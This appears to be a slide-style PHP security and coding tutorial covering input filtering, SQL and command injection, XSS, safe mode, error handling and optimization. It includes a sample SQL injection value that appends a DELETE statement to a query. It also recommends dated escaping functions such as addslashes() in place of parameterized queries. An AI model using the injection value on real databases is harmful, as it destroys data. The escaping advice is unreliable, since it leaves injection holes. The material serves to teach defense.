In this section I will cover:

Data filtering
SQL injection
Command injection
XSS
Safe mode
Coding Standards
Error logging
Debugging and optimization

Data Filtering

Users are evil and sometimes they don’t even know it. You should always “taint” and filter data PHP provides lots of functions that can help here.
Never rely on register_globals. In fact, if you’re writing for redistribution, undo its effects if it is on.
Data filtering depends on what you need to do with it. You will rarely need “raw” data. Most of the time, it needs to be escaped to do something or ether—e.g.: display, insert into db, and so on

SQL Injection

SQL injection occurs when improperly filtered data ends up in a database query

“SELECT * FROM USER WHERE ID = $id”
$id = “1; DELETE FROM USER;”

Most DBMS modules have their own escaping mechanisms

mysql_real_escape_string()
addslashes() — The swiss army knife approach

Command Injection

Command injection takes place when improperly filtered input ends up in a shell command
Both commands and parameters should be escaped:
escapeshellcmd ($cmd)
escapeshellarg ($arg)
shell_exec ($cmd . ‘ ‘ . $arg)

Cross-site Scripting

XSS happens when improperly escaped input is outputted to the client. XSS can be used for all sorts of nasty purposes. Often underrated, it is an extremely serious security problem. It’s often easy to implement on the attacker’s side
User input needs properly escaped before being outputted back to the browser

htmlspecialchars()
htmlentities()
strip_tags()

Safe Mode

Safe mode implements certain restrictions to help prevent security problems.
UID matching open_basedir restrictions. Safe mode and open_basedir have several drawbacks

PHP is not the right place for implementing security at this level. Files created in safe_mode may not be readable by your scripts! Add noticeable overhead to the system

Coding Standards

• Coding standards help writing good code
• There is no “official” standard connected for PHP.
• A few ideas:
• Flattening if statements
• Splitting long statements across multiple lines
• Using substitution instead of concatenation
• Watch out for performance hits Comparison vs. Assignment
• Reverse comparisons
• Use type-sensitive comparisons when possible
• Validate resources

Error Management

PHP has an impressive array of error management facilities—use them!
Report all errors during development. • Keep error reporting on in production, but shift to logging. Implement your own error handlers

Debugging

• Debugging can be very difficult
• “Echo” debugging is the simplest form
• Output status throughout the script’s execution
• Complex logic is better handled through external debuggers
• Lots available—from open source (Xdebug) commercial (e.g.: Zend Studio IDE)
• IDEs support both local and remote debugging

Optimization

• Optimization can be as simple as installing a bytecode cache
• No changes to codebase
• Immediate (but limited) benefits
• Proper optimization requires good analysis Finding bottlenecks
• Optimization can take place on multiple levels:
• Write faster code
• Remove external bottlenecks
• Use caching for internal bottlenecks
• Improve web server configuration